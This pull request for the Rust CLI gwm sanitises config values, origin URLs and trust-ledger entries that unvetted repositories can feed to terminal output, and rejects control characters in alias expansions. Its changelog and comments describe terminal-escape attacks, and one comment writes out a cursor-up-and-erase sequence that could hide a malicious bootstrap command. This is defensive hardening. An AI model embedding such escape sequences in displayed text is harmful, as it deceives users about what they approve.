### PR TITLE
🔒 fix(cli): neutralise the config strings every ungated command echoes

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -173,6 +173,30 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Fixed
 
+- Config values no longer reach the terminal with their control bytes intact.
+  A `.gwm.toml` comes from a repo nobody has vetted, and the commands that read
+  it back skip the trust gate on purpose, because inspecting an unfamiliar repo
+  before trusting it is meant to be the safe move. Echoing a value verbatim
+  handed that file a terminal escape channel out of a read-only command: an
+  OSC 52 clipboard write, a window-title rewrite, cursor moves that erase the
+  line above.
+
+  `gwm config get`, `config list` (its keys, which are attacker-chosen wherever
+  the schema is a map), `types`, `aliases list`, `doctor`, `commit-prefix` and
+  the TOFU prompt are all covered. So is `toml`'s parse error, which quotes the
+  offending source line verbatim and therefore needed no echo command at all —
+  running `gwm list` inside the repo was enough.
+
+  The one that matters most is the prompt: its bootstrap summary renders
+  directly above `Trust this .gwm.toml? [y/N/show]:`, so a cursor-up-and-erase
+  in a `[[bootstrap.command]]` name could delete the row naming the shell it
+  was asking permission to run.
+
+  Values are replaced rather than stripped, so what is left stays recognisable
+  and no length changes silently. Output that is meant to span rows — a parse
+  diagnostic, the raw body shown by `show` — keeps its line breaks and loses
+  everything else.
+
 - `worktree` patterns are expanded in a single pass, so an expansion is a value
   rather than more template. `expand_placeholders` chained `str::replace` calls
   and each one re-scanned what the previous had written, with `{home}` and

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -182,10 +182,11 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   line above.
 
   `gwm config get`, `config list` (its keys, which are attacker-chosen wherever
-  the schema is a map), `types`, `aliases list`, `doctor`, `commit-prefix` and
-  the TOFU prompt are all covered. So is `toml`'s parse error, which quotes the
-  offending source line verbatim and therefore needed no echo command at all —
-  running `gwm list` inside the repo was enough.
+  the schema is a map), `types`, `aliases list`, `doctor`, `commit-prefix`,
+  `trust list` / `show` / `add` / `revoke`, the milestone and label diff rows,
+  and the TOFU prompt are all covered. So is every error message, which needed
+  no echo command at all: `toml`'s parse error quotes the offending source line
+  verbatim, so running `gwm list` inside the repo was enough.
 
   The one that matters most is the prompt: its bootstrap summary renders
   directly above `Trust this .gwm.toml? [y/N/show]:`, so a cursor-up-and-erase
@@ -193,9 +194,16 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   was asking permission to run.
 
   Values are replaced rather than stripped, so what is left stays recognisable
-  and no length changes silently. Output that is meant to span rows — a parse
-  diagnostic, the raw body shown by `show` — keeps its line breaks and loses
-  everything else.
+  and no length changes silently. Errors keep their line breaks, because a
+  parse diagnostic points at the broken column across several rows, but every
+  line after the first now sits under gwm's own margin. That is what stops a
+  value carrying a newline from printing a second line at column zero that
+  reads like a statement from gwm rather than a quote from the repo.
+
+  One value is refused rather than neutralised: an `[aliases]` expansion
+  becomes argv before the CLI parser runs, and that parser prints its own
+  errors without passing through gwm's output path, so a control character
+  there is rejected when the config loads.
 
 - `worktree` patterns are expanded in a single pass, so an expansion is a value
   rather than more template. `expand_placeholders` chained `str::replace` calls

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -3,7 +3,7 @@
 All notable changes to this project will be documented here.
 
 This file tracks the **in-progress** release only. Past releases live under
-[`changelogs/`](changelogs/) — one Markdown file per SemVer version.
+[`changelogs/`](changelogs/), one Markdown file per SemVer version.
 
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
@@ -12,7 +12,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 <!-- RELEASE NOTE: before publishing, rewrite BOTH sections below (Added and
      Fixed) in the advisory's own wording and reference the GHSA id. The full
-     write-up — impact, threat model, reproduction — lives in the draft
+     write-up (impact, threat model, reproduction) lives in the draft
      advisory, not in this file, until it is published. -->
 
 ### Added
@@ -82,7 +82,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   pastille. ([#481](https://github.com/kbrdn1/gwm-cli/issues/481))
 
 - Free-form worktree naming. `gwm create --name spike-redis` skips the
-  `<type> <issue> <desc>` triple entirely — not every worktree corresponds to
+  `<type> <issue> <desc>` triple entirely: not every worktree corresponds to
   an issue. In the TUI, `Ctrl-T` toggles the create form between the
   structured triple and a single `Name` field. The flag is exclusive with the
   positionals, so a partial triple is still the typo it always was; the mode
@@ -91,8 +91,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   The name becomes the branch verbatim, and is validated verbatim: `--name
   " spike"` is refused rather than trimmed into `spike`, which would be a
   different branch from the one asked for. `branch_pattern` / `path_pattern`
-  do not apply — they are written in terms of `{type}` / `{issue}` / `{desc}`,
-  and a free-form name has none of them — while `[worktree].base` still does,
+  do not apply, being written in terms of `{type}` / `{issue}` / `{desc}`,
+  and a free-form name has none of them, while `[worktree].base` still does,
   so free-form worktrees land beside the structured ones. `base` is only
   expanded with the placeholders it documents, though: the structured path
   feeds `{type}` / `{issue}` / `{desc}` through `base` too, and since an
@@ -103,7 +103,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   auto-linking goes inactive (`gwm link` remains), `gwm commit-prefix` errors
   because a prefix is derived from the branch type and there is none, and
   create/remove/bootstrap hook placeholders resolve empty. PR/MR detection is
-  unaffected — it queries the forge with the whole branch name. `doctor`
+  unaffected: it queries the forge with the whole branch name. `doctor`
   treats the branch as user-managed and never flags it. All of which applies
   to a name that does *not* match the branch convention: nothing records how
   a worktree was named, only what its branch is, so `--name 'feat/#42-x'` is
@@ -111,7 +111,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
   The accepted-name rules are enumerated from the three things a free-form
   name has to be at once, rather than accreted one example at a time. It is a
-  **git branch** — validated with libgit2's branch-level oracle, which is
+  **git branch**, validated with libgit2's branch-level oracle, which is
   stricter than the reference-level one (`refs/heads/HEAD` is a valid
   reference name, `HEAD` is not a usable branch name). It is a **single
   filesystem path component**, which a branch name is not: no `.` / `..`
@@ -125,13 +125,13 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   Windows path rules are covered by
   [#475](https://github.com/kbrdn1/gwm-cli/issues/475) below, on every
   platform rather than only that one.
-  No `SCHEMA_VERSION` bump — `JsonWorktree` carries no `type` / `desc`, so
+  No `SCHEMA_VERSION` bump: `JsonWorktree` carries no `type` / `desc`, so
   the wire format is unchanged.
   ([#416](https://github.com/kbrdn1/gwm-cli/issues/416))
 
-- Lifecycle hooks receive their context as environment variables —
+- Lifecycle hooks receive their context as environment variables,
   `GWM_BRANCH`, `GWM_PATH`, `GWM_TYPE`, `GWM_ISSUE`, `GWM_DESC`, `GWM_USER`,
-  `GWM_OWNER`, `GWM_REPO` — alongside the existing `{placeholder}` syntax. A
+  `GWM_OWNER`, `GWM_REPO`, alongside the existing `{placeholder}` syntax. A
   hook can now read `"$GWM_BRANCH"` and not think about quoting at all: a
   shell never re-parses metacharacters coming out of a variable. An explicit
   `env` entry of the same name still wins.
@@ -307,23 +307,23 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - `gwm doctor` and `gwm config validate` now warn when
   `worktree.branch_pattern` does not survive a format-then-parse round-trip.
   The pattern drives how a branch name is *written* but not how one is *read
-  back* — the parser is still a hardcoded regex — so a mismatched pattern
+  back* (the parser is still a hardcoded regex) so a mismatched pattern
   silently broke issue/PR auto-linking, gitmoji selection, lifecycle hook
   placeholders and the branch-convention check. The warning names whichever
   segments actually break: a custom pattern is not automatically a broken one
   (`{type}/#{issue}-prefix-{desc}` still recovers `type` and `issue`, only
   `desc` comes back wrong), and claiming otherwise would defeat the point of a
   warning whose whole value is accuracy. The probe enumerates the value space
-  `gwm create` admits rather than sampling it — every configured branch type,
+  `gwm create` admits rather than sampling it: every configured branch type,
   a single- and a multi-digit issue, a desc with and without the `-` it
-  allows, and the real repo name for `{repo}` — so a pattern that breaks on
+  allows, and the real repo name for `{repo}`, so a pattern that breaks on
   only some values is reported as breaking on only some values. `gwm config validate` prints it on
   stderr, reads the *effective* pattern so one set only in the global
   `~/.config/gwm/config.toml` is caught too, and still exits `0`: a custom
   pattern is valid configuration, not an error (`gwm doctor` reports it as a
   `!` check, so that command exits `1` like any other Warning). The
   config-supplied pattern is neutralised for control characters before it is
-  echoed — neither command goes through the trust gate, so an unvetted
+  echoed: neither command goes through the trust gate, so an unvetted
   `.gwm.toml` must not get a terminal escape channel out of a health check.
   This states the limitation; the entry below removes its cause, so the set of
   patterns it has anything to say about is much smaller than it was.
@@ -456,18 +456,18 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   `$`, backticks, parentheses and redirections in a ref name, and a ref can
   arrive from someone else's push, so an unescaped `{branch}` let a name
   decide what the hook actually ran. `env` values are deliberately left
-  unescaped — they go to the process environment and never see a shell, so
+  unescaped: they go to the process environment and never see a shell, so
   escaping them would put literal quote characters into what the hook reads
   back. `[[bootstrap.command]]` steps fold into the same path and get the
   same treatment.
 
   Expansion is also single-pass now. Chained replacements re-scanned what the
   previous one wrote, so a branch named `spike-{issue}` had the token inside
-  its own name rewritten — and with escaping in play that would have spliced
+  its own name rewritten, and with escaping in play that would have spliced
   quote characters into the middle of another value.
 
   An **empty** placeholder is left alone rather than escaped. It has nothing
-  to inject, and `shell_words::quote("")` is `''` — escaping it would mean
+  to inject, and `shell_words::quote("")` is `''`, so escaping it would mean
   `mycmd {issue}` started passing an empty argument where it passed none,
   on every branch that does not match the convention. Hooks therefore see no
   change at all beyond the one this fixes.
@@ -486,49 +486,49 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 In reverse chronological order:
 
-- [`1.5.0`](changelogs/1.5.0.md) — 2026-07-26
-- [`1.4.0`](changelogs/1.4.0.md) — 2026-07-25
-- [`1.3.0`](changelogs/1.3.0.md) — 2026-07-24
-- [`1.2.0`](changelogs/1.2.0.md) — 2026-07-21
-- [`1.1.1`](changelogs/1.1.1.md) — 2026-07-16
-- [`1.1.0`](changelogs/1.1.0.md) — 2026-07-15
-- [`1.0.3`](changelogs/1.0.3.md) — 2026-07-09
-- [`1.0.2`](changelogs/1.0.2.md) — 2026-07-06
-- [`1.0.1`](changelogs/1.0.1.md) — 2026-07-01
-- [`1.0.0`](changelogs/1.0.0.md) — 2026-06-26
-- [`0.9.0`](changelogs/0.9.0.md) — 2026-06-07
-- [`0.8.0`](changelogs/0.8.0.md) — 2026-06-01
-- [`0.7.0`](changelogs/0.7.0.md) — 2026-05-23
-- [`0.6.0`](changelogs/0.6.0.md) — 2026-05-21
-- [`0.5.0`](changelogs/0.5.0.md) — 2026-05-20
-- [`0.4.0`](changelogs/0.4.0.md) — 2026-05-19
-- [`0.3.0`](changelogs/0.3.0.md) — 2026-05-19
-- [`0.2.0`](changelogs/0.2.0.md) — 2026-05-18
-- [`0.1.0`](changelogs/0.1.0.md) — 2026-05-18
+- [`1.5.0`](changelogs/1.5.0.md), 2026-07-26
+- [`1.4.0`](changelogs/1.4.0.md), 2026-07-25
+- [`1.3.0`](changelogs/1.3.0.md), 2026-07-24
+- [`1.2.0`](changelogs/1.2.0.md), 2026-07-21
+- [`1.1.1`](changelogs/1.1.1.md), 2026-07-16
+- [`1.1.0`](changelogs/1.1.0.md), 2026-07-15
+- [`1.0.3`](changelogs/1.0.3.md), 2026-07-09
+- [`1.0.2`](changelogs/1.0.2.md), 2026-07-06
+- [`1.0.1`](changelogs/1.0.1.md), 2026-07-01
+- [`1.0.0`](changelogs/1.0.0.md), 2026-06-26
+- [`0.9.0`](changelogs/0.9.0.md), 2026-06-07
+- [`0.8.0`](changelogs/0.8.0.md), 2026-06-01
+- [`0.7.0`](changelogs/0.7.0.md), 2026-05-23
+- [`0.6.0`](changelogs/0.6.0.md), 2026-05-21
+- [`0.5.0`](changelogs/0.5.0.md), 2026-05-20
+- [`0.4.0`](changelogs/0.4.0.md), 2026-05-19
+- [`0.3.0`](changelogs/0.3.0.md), 2026-05-19
+- [`0.2.0`](changelogs/0.2.0.md), 2026-05-18
+- [`0.1.0`](changelogs/0.1.0.md), 2026-05-18
 
 ### Pre-releases
 
 Per-RC notes covering only the delta against the previous RC (or against the previous stable, for `rc.1`):
 
-- [`0.10.0-rc.4`](changelogs/pre-releases/0.10.0-rc.4.md) — 2026-06-17
-- [`0.10.0-rc.3`](changelogs/pre-releases/0.10.0-rc.3.md) — 2026-06-17
-- [`0.10.0-rc.2`](changelogs/pre-releases/0.10.0-rc.2.md) — 2026-06-16
-- [`0.10.0-rc.1`](changelogs/pre-releases/0.10.0-rc.1.md) — 2026-06-10
-- [`0.9.0-rc.3`](changelogs/pre-releases/0.9.0-rc.3.md) — 2026-06-07
-- [`0.9.0-rc.2`](changelogs/pre-releases/0.9.0-rc.2.md) — 2026-06-06
-- [`0.9.0-rc.1`](changelogs/pre-releases/0.9.0-rc.1.md) — 2026-06-02
-- [`0.8.0-rc.5`](changelogs/pre-releases/0.8.0-rc.5.md) — 2026-06-01
-- [`0.8.0-rc.4`](changelogs/pre-releases/0.8.0-rc.4.md) — 2026-05-29
-- [`0.8.0-rc.3`](changelogs/pre-releases/0.8.0-rc.3.md) — 2026-05-29
-- [`0.8.0-rc.2`](changelogs/pre-releases/0.8.0-rc.2.md) — 2026-05-23
-- [`0.8.0-rc.1`](changelogs/pre-releases/0.8.0-rc.1.md) — 2026-05-23
-- [`0.7.0-rc.3`](changelogs/pre-releases/0.7.0-rc.3.md) — 2026-05-23
-- [`0.7.0-rc.2`](changelogs/pre-releases/0.7.0-rc.2.md) — 2026-05-23
-- [`0.7.0-rc.1`](changelogs/pre-releases/0.7.0-rc.1.md) — 2026-05-22
-- [`0.6.0-rc.1`](changelogs/pre-releases/0.6.0-rc.1.md) — 2026-05-20
-- [`0.5.0-rc.2`](changelogs/pre-releases/0.5.0-rc.2.md) — 2026-05-19
-- [`0.5.0-rc.1`](changelogs/pre-releases/0.5.0-rc.1.md) — 2026-05-19
-- [`0.3.0-rc.3`](changelogs/pre-releases/0.3.0-rc.3.md) — 2026-05-19
-- [`0.3.0-rc.2`](changelogs/pre-releases/0.3.0-rc.2.md) — 2026-05-19
-- [`0.3.0-rc.1`](changelogs/pre-releases/0.3.0-rc.1.md) — 2026-05-19
-- [`0.2.0-rc.1`](changelogs/pre-releases/0.2.0-rc.1.md) — 2026-05-18
+- [`0.10.0-rc.4`](changelogs/pre-releases/0.10.0-rc.4.md), 2026-06-17
+- [`0.10.0-rc.3`](changelogs/pre-releases/0.10.0-rc.3.md), 2026-06-17
+- [`0.10.0-rc.2`](changelogs/pre-releases/0.10.0-rc.2.md), 2026-06-16
+- [`0.10.0-rc.1`](changelogs/pre-releases/0.10.0-rc.1.md), 2026-06-10
+- [`0.9.0-rc.3`](changelogs/pre-releases/0.9.0-rc.3.md), 2026-06-07
+- [`0.9.0-rc.2`](changelogs/pre-releases/0.9.0-rc.2.md), 2026-06-06
+- [`0.9.0-rc.1`](changelogs/pre-releases/0.9.0-rc.1.md), 2026-06-02
+- [`0.8.0-rc.5`](changelogs/pre-releases/0.8.0-rc.5.md), 2026-06-01
+- [`0.8.0-rc.4`](changelogs/pre-releases/0.8.0-rc.4.md), 2026-05-29
+- [`0.8.0-rc.3`](changelogs/pre-releases/0.8.0-rc.3.md), 2026-05-29
+- [`0.8.0-rc.2`](changelogs/pre-releases/0.8.0-rc.2.md), 2026-05-23
+- [`0.8.0-rc.1`](changelogs/pre-releases/0.8.0-rc.1.md), 2026-05-23
+- [`0.7.0-rc.3`](changelogs/pre-releases/0.7.0-rc.3.md), 2026-05-23
+- [`0.7.0-rc.2`](changelogs/pre-releases/0.7.0-rc.2.md), 2026-05-23
+- [`0.7.0-rc.1`](changelogs/pre-releases/0.7.0-rc.1.md), 2026-05-22
+- [`0.6.0-rc.1`](changelogs/pre-releases/0.6.0-rc.1.md), 2026-05-20
+- [`0.5.0-rc.2`](changelogs/pre-releases/0.5.0-rc.2.md), 2026-05-19
+- [`0.5.0-rc.1`](changelogs/pre-releases/0.5.0-rc.1.md), 2026-05-19
+- [`0.3.0-rc.3`](changelogs/pre-releases/0.3.0-rc.3.md), 2026-05-19
+- [`0.3.0-rc.2`](changelogs/pre-releases/0.3.0-rc.2.md), 2026-05-19
+- [`0.3.0-rc.1`](changelogs/pre-releases/0.3.0-rc.1.md), 2026-05-19
+- [`0.2.0-rc.1`](changelogs/pre-releases/0.2.0-rc.1.md), 2026-05-18

--- a/docs/3.cli/1.reference.md
+++ b/docs/3.cli/1.reference.md
@@ -547,7 +547,7 @@ gwm labels push --random-colors       # random pastel for entries with no `color
 `list` output sigils mirror the diff buckets:
 
 ```
-+ bug                  (will create — color #d73a4a)
++ bug                  (will create, color #d73a4a)
 ~ good first issue     (color #008672 → #7057ff)
 = documentation        (match)
 - wontfix              (on remote, not in config)
@@ -574,7 +574,7 @@ gwm milestones push --prune             # also delete milestones not in config
 `list` output sigils mirror the diff buckets:
 
 ```
-+ v0.7.0               (will create — state open, due 2026-07-15T23:59:59Z)
++ v0.7.0               (will create, state open, due 2026-07-15T23:59:59Z)
 ~ v0.6.0               (due 2026-07-01T23:59:59Z → 2026-07-15T23:59:59Z)
 = v0.5.0               (match)
 - old-sprint           (#3 on remote, not in config)

--- a/docs/fr/3.cli/1.reference.md
+++ b/docs/fr/3.cli/1.reference.md
@@ -550,7 +550,7 @@ gwm labels push --random-colors       # random pastel for entries with no `color
 Les sigils de sortie de `list` reflètent les groupes de diff :
 
 ```
-+ bug                  (will create — color #d73a4a)
++ bug                  (will create, color #d73a4a)
 ~ good first issue     (color #008672 → #7057ff)
 = documentation        (match)
 - wontfix              (on remote, not in config)
@@ -577,7 +577,7 @@ gwm milestones push --prune             # also delete milestones not in config
 Les sigils de sortie de `list` reflètent les groupes de diff :
 
 ```
-+ v0.7.0               (will create — state open, due 2026-07-15T23:59:59Z)
++ v0.7.0               (will create, state open, due 2026-07-15T23:59:59Z)
 ~ v0.6.0               (due 2026-07-01T23:59:59Z → 2026-07-15T23:59:59Z)
 = v0.5.0               (match)
 - old-sprint           (#3 on remote, not in config)

--- a/src/aliases.rs
+++ b/src/aliases.rs
@@ -475,7 +475,7 @@ pub fn validate_aliases(map: &BTreeMap<String, String>, source_label: &str) -> R
     // quoted with `{:?}` so the report cannot replay what it is refusing.
     if let Some(bad) = value.chars().find(|c| c.is_control()) {
       return Err(GwmError::Config(format!(
-        "{}: alias '{}' = {:?} contains control character {:?} — \
+        "{}: alias '{}' = {:?} contains control character {:?}; \
          an expansion becomes argv, and a control character there is a terminal \
          escape rather than an argument",
         source_label, name, value, bad

--- a/src/aliases.rs
+++ b/src/aliases.rs
@@ -463,6 +463,24 @@ pub fn validate_aliases(map: &BTreeMap<String, String>, source_label: &str) -> R
         )));
       }
     }
+    // Issue #473. An alias expansion becomes argv BEFORE clap parses it, and
+    // clap prints its own error and exits without passing through the stderr
+    // sink in `main`. Clap strips the ASCII controls from the token it quotes,
+    // but not the C1 range: measured, `\u{9b}` (CSI) and `\u{85}` (NEL) came
+    // out of `gwm <alias>` intact.
+    //
+    // Rejected at the boundary rather than cleaned at the sink, because argv
+    // has more than one downstream and clap's is the one we do not own. No
+    // legitimate expansion needs a control character; the name and value are
+    // quoted with `{:?}` so the report cannot replay what it is refusing.
+    if let Some(bad) = value.chars().find(|c| c.is_control()) {
+      return Err(GwmError::Config(format!(
+        "{}: alias '{}' = {:?} contains control character {:?} — \
+         an expansion becomes argv, and a control character there is a terminal \
+         escape rather than an argument",
+        source_label, name, value, bad
+      )));
+    }
   }
   Ok(())
 }

--- a/src/cli.rs
+++ b/src/cli.rs
@@ -4424,10 +4424,16 @@ fn cmd_trust_list() -> Result<()> {
     ledger.entries.len(),
     if ledger.entries.len() == 1 { "y" } else { "ies" }
   );
+  // Issue #473, Codex pass 2: `trust show` cats the ledger file, where TOML
+  // has already escaped any control byte in a value, but `load` DECODES it, so
+  // every command that reads the ledger back through `TrustLedger` handles the
+  // real character. `origin` is a remote URL that arrived with a clone, and
+  // this listing is exactly what someone runs to audit what they trusted.
+  let clean = crate::naming::sanitise_for_terminal;
   let origin_w = ledger
     .entries
     .iter()
-    .map(|e| e.origin.len())
+    .map(|e| clean(&e.origin).len())
     .max()
     .unwrap_or(6)
     .clamp(6, 60);
@@ -4440,10 +4446,10 @@ fn cmd_trust_list() -> Result<()> {
     let short_sha: String = e.config_sha.chars().take(12).collect();
     println!(
       "  {:<ow$}  {}  trusted_at {}  by {}",
-      e.origin,
-      short_sha,
+      clean(&e.origin),
+      clean(&short_sha),
       e.trusted_at.to_rfc3339(),
-      e.trusted_by,
+      clean(&e.trusted_by),
       ow = origin_w,
     );
   }
@@ -4454,8 +4460,11 @@ fn cmd_trust_revoke(origin: String) -> Result<()> {
   let path = trust::default_ledger_path()?;
   let mut ledger = TrustLedger::load(&path)?;
   let removed = ledger.revoke(&origin);
+  // Echoed back rather than read from the ledger, but it lands in the same
+  // terminal and costs one call (issue #473).
+  let shown = crate::naming::sanitise_for_terminal(&origin);
   if removed == 0 {
-    println!("0 entries matched origin {} (nothing to revoke).", origin);
+    println!("0 entries matched origin {} (nothing to revoke).", shown);
     return Ok(());
   }
   ledger.save(&path)?;
@@ -4463,7 +4472,7 @@ fn cmd_trust_revoke(origin: String) -> Result<()> {
     "✓ revoked {} entr{} for {}",
     removed,
     if removed == 1 { "y" } else { "ies" },
-    origin
+    shown
   );
   Ok(())
 }
@@ -4477,7 +4486,12 @@ fn cmd_trust_add() -> Result<()> {
   match trust::record_config(&workdir, &key, &trust::current_actor())? {
     Some(sha) => {
       let short: String = sha.chars().take(12).collect();
-      println!("✓ trusted {} (.gwm.toml {})", key, short);
+      // `key` is the repo's origin URL (issue #473).
+      println!(
+        "✓ trusted {} (.gwm.toml {})",
+        crate::naming::sanitise_for_terminal(&key),
+        short
+      );
       Ok(())
     }
     None => Err(GwmError::Other(format!(
@@ -4566,7 +4580,11 @@ fn trust_or_prompt(workdir: &Path, repo: Option<&Repository>, mode: TrustMode) -
 
       ledger.record(&origin, &sha, &trust::current_actor());
       ledger.save(&ledger_path)?;
-      println!("✓ recorded trust for {} in {}", origin, ledger_path.display());
+      println!(
+        "✓ recorded trust for {} in {}",
+        crate::naming::sanitise_for_terminal(&origin),
+        ledger_path.display()
+      );
       Ok(())
     }
   }

--- a/src/cli.rs
+++ b/src/cli.rs
@@ -4607,29 +4607,43 @@ fn prompt_user(cfg_path: &Path, bytes: &[u8], origin: &str, sha: &str) -> Result
 }
 
 fn print_bootstrap_summary(cfg: &Config) {
+  for line in bootstrap_summary_lines(cfg) {
+    println!("{}", line);
+  }
+}
+
+/// The lines the TOFU prompt shows for an **untrusted** `.gwm.toml`, as
+/// values rather than as `println!` side effects (issue #473).
+///
+/// A value so the highest-stakes echo in the binary can be asserted on
+/// without driving a PTY: this summary is rendered immediately above
+/// `Trust this .gwm.toml? [y/N/show]:`, from a file the user has by
+/// definition not vetted, and it is the only thing standing between them
+/// and a `[[bootstrap.command]]` that runs arbitrary shell.
+pub fn bootstrap_summary_lines(cfg: &Config) -> Vec<String> {
   let bs = &cfg.bootstrap;
   if bs.copy.is_empty() && bs.command.is_empty() && bs.guard.is_empty() && bs.no_symlink.is_empty() {
-    println!("     bootstrap surface: (empty — no copies/commands/guards/no_symlinks declared)");
-    return;
+    return vec!["     bootstrap surface: (empty — no copies/commands/guards/no_symlinks declared)".to_string()];
   }
-  println!("     bootstrap surface:");
+  let mut lines = vec!["     bootstrap surface:".to_string()];
   for c in &bs.copy {
-    println!("       - copy   {} → {}", c.from, c.to);
+    lines.push(format!("       - copy   {} → {}", c.from, c.to));
   }
   for g in &bs.guard {
-    println!(
+    lines.push(format!(
       "       - guard  {} (on_match={}, deny={} pattern(s))",
       g.name,
       g.on_match,
       g.deny_patterns.len()
-    );
+    ));
   }
   for ns in &bs.no_symlink {
-    println!("       - no-symlink {}", ns.path);
+    lines.push(format!("       - no-symlink {}", ns.path));
   }
   for c in &bs.command {
-    println!("       - run    {} ({})", c.name, c.run);
+    lines.push(format!("       - run    {} ({})", c.name, c.run));
   }
+  lines
 }
 
 // ---- Aliases commands (issue #86) ---------------------------------------

--- a/src/cli.rs
+++ b/src/cli.rs
@@ -3449,21 +3449,40 @@ fn print_doctor_report(report: &doctor::DoctorReport) {
   // Issue #473: several checks quote config-supplied strings in their detail
   // (`base directory writable` renders `[worktree].base`, the guard checks
   // name their entries). Neutralised here, at the single sink, rather than in
-  // each `Check::ok` / `failed` call — so a check added later is covered
+  // each `Check::ok` / `failed` call, so a check added later is covered
   // without anyone having to remember.
-  let clean = crate::naming::sanitise_for_terminal;
+  //
+  // A detail can span rows: `check_config_parses` puts `toml`'s whole
+  // caret-under-the-column diagnostic in it. Flattening that turned the output
+  // of the recovery command into `?  |?1 | [worktree?`, so line breaks survive
+  // here too. They are safe for the same reason they are safe in `main`: this
+  // printer owns the margin, and every row it emits is indented under the
+  // check that produced it.
+  let clean = crate::naming::sanitise_block_for_terminal;
+  let indented = |text: &str, first: &str| {
+    let cleaned = clean(text);
+    let mut lines = cleaned.split('\n');
+    let mut out = format!("{}{}", first, lines.next().unwrap_or_default());
+    for line in lines {
+      out.push_str("\n      ");
+      out.push_str(line);
+    }
+    out
+  };
   for c in &report.checks {
     let sigil = match c.status {
       CheckStatus::Ok => "✓",
       CheckStatus::Warning => "!",
       CheckStatus::Failed => "✗",
     };
-    println!("{} {}", sigil, clean(&c.name));
+    // The check name is a fixed label, never config text, but it shares the
+    // helper so a check that starts naming its subject cannot slip through.
+    println!("{} {}", sigil, crate::naming::sanitise_for_terminal(&c.name));
     if !c.detail.is_empty() {
-      println!("    {}", clean(&c.detail));
+      println!("{}", indented(&c.detail, "    "));
     }
     if let Some(hint) = &c.fix_hint {
-      println!("    → {}", clean(hint));
+      println!("{}", indented(hint, "    → "));
     }
   }
 }
@@ -3505,7 +3524,7 @@ fn cmd_types(gitmoji_flag: bool) -> Result<()> {
   // (from `[gitmoji]`) are free text out of an unvetted `.gwm.toml`; `name` is
   // not, it is already constrained to `^[a-z]+$` by `validate_branch_types`.
   // Widths are measured on the neutralised strings so the columns still line
-  // up — a replaced C1 control character is two bytes narrower than the one
+  // up: a replaced C1 control character is two bytes narrower than the one
   // it replaced.
   let clean = crate::naming::sanitise_for_terminal;
   let sc_width = match &gitmoji_map {
@@ -3649,7 +3668,7 @@ fn cmd_commit_prefix(branch_override: Option<String>, unicode: bool) -> Result<(
   let map = gitmoji::load(workdir.as_deref())?;
   let prefix = gitmoji::resolve_prefix(&map, &spec, unicode);
   // Issue #473: the prefix is assembled from `[gitmoji]` shortcodes read out
-  // of `.gwm.toml`, and this command is ungated by design — shell prompts and
+  // of `.gwm.toml`, and this command is ungated by design: shell prompts and
   // the bundled commit-msg hook call it on every commit, in whatever repo the
   // user happens to be sitting in.
   println!("{}", crate::naming::sanitise_for_terminal(&prefix));
@@ -4547,7 +4566,7 @@ fn cmd_trust_show() -> Result<()> {
   match std::fs::read_to_string(&path) {
     Ok(body) => {
       // Issue #473: the ledger records one origin key per trusted repo, and
-      // an origin is a remote URL that arrived with a clone. Block variant —
+      // an origin is a remote URL that arrived with a clone. Block variant,
       // the ledger is a file and its rows are its shape.
       let body = crate::naming::sanitise_block_for_terminal(&body);
       println!("---");
@@ -4651,7 +4670,7 @@ fn prompt_user(cfg_path: &Path, bytes: &[u8], origin: &str, sha: &str) -> Result
   println!("     path   : {}", cfg_path.display());
   // Issue #473: `origin` is a remote URL out of `.git/config`, which travels
   // with a clone just like `.gwm.toml` does. Nothing here has been vetted yet
-  // — that is what the prompt below is asking.
+  // That is what the prompt below is asking.
   println!("     origin : {}", crate::naming::sanitise_for_terminal(origin));
   println!("     hash   : {}", sha);
   if let Some(cfg) = parsed.as_ref() {
@@ -4676,7 +4695,7 @@ fn prompt_user(cfg_path: &Path, bytes: &[u8], origin: &str, sha: &str) -> Result
       "show" | "s" => {
         // Issue #473: the block variant, because this IS the file and its
         // line breaks are its shape. Neutralising the rest is not "breaking
-        // raw" — an escape sequence buried in the body defeats the very
+        // raw": an escape sequence buried in the body defeats the very
         // inspection `show` exists to provide.
         let body = crate::naming::sanitise_block_for_terminal(&body);
         println!("---");
@@ -4716,7 +4735,7 @@ pub fn bootstrap_summary_lines(cfg: &Config) -> Vec<String> {
     return vec!["     bootstrap surface: (empty — no copies/commands/guards/no_symlinks declared)".to_string()];
   }
   // Issue #473: every field below is verbatim text from a file the user has
-  // NOT trusted — that is the whole premise of the prompt this feeds. Left
+  // NOT trusted, which is the whole premise of the prompt this feeds. Left
   // raw, `\u{1b}[1A\u{1b}[2K` in a `[[bootstrap.command]]` name walks the
   // cursor up and erases the row above, so the malicious `run` line can
   // delete the very evidence the summary exists to show.
@@ -4792,7 +4811,7 @@ fn cmd_aliases_list() -> Result<()> {
   let resolved = crate::aliases::load(repo_workdir.as_deref(), None)?;
 
   // Issue #473: repo and user alias tables are arbitrary key/value text from
-  // a `.gwm.toml` this command reads WITHOUT the trust gate — auditing an
+  // a `.gwm.toml` this command reads WITHOUT the trust gate: auditing an
   // unfamiliar repo's aliases before running anything is exactly what it is
   // for. Built-ins are compiled in and need no cleaning, but they share the
   // helper so a future built-in read from a file cannot slip through.
@@ -4835,7 +4854,7 @@ fn cmd_aliases_list() -> Result<()> {
     for (name, expansion) in &resolved.user {
       // Mark entries shadowed by a repo declaration so the user can
       // see why a `gwm <name>` does not pick up the user expansion.
-      // Shadowing is probed on the raw name — that is the identity the
+      // Shadowing is probed on the raw name, which is the identity the
